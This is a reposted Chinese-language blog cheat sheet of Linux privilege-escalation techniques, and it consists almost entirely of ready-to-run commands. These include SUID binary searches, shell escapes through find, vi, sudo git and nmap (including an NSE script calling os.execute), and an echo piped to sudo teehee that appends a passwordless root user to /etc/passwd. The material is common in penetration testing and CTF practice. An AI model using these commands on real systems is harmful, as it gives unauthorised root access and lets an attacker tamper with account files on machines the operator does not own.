Linux提權方法小結

本文轉載自查看原文 2022-02-17 10:48 738 Linux安全

1 find 命令提權

1.1 方法一

find / -perm -g=s -type f 2>/dev/null
find . -exec /bin/sh -p \;-quit

1.2 方法二

touch getshell
find / -type f -name getshell -exec "whoami" \;
find / -type f -name getshell -exec "/bin/sh" \;

1.3 方法三

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {};
touch test
find . -exec /bin/sh -p \;-quit

2 vi 命令逃逸

vi
# 輸入以下內容
:set shell=/bin/sh
:shell

3 git 命令提權

3.1 方法一

sudo git help config
# 直接輸入以下內容
!/bin/bash 或 !'sh'

3.2 方法二

sudo git -p help
# 直接輸入以下內容
!/bin/bash

4 teehee 命令提權

# teehee 可以將標准輸入復制到文件中
# 如下命令可以在 /etc/passwd 文件中添加一行，實現添加一個擁有 root 權限的用戶
echo "test::0:0:::/bin/sh" | sudo teehee -a /etc/passwd
# 切換用戶
su test

5 nmap 提權

舊版本

sudo nmap --interactive
!/bin/sh

新版本

# 進入一個可寫目錄，新建 nse_root.nse，內容為
os.execute("/bin/sh")
sudo nmap --script=nse_root.nse

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Linux提權小結 udf提權小結提權小結 Windows提權小結 linux提權方法(不斷總結更新) linux提權方法（不斷更新）菜刀滲透提權小結 Linux提權之：利用capabilities提權 Linux提權之SUID提權 Linux提權思路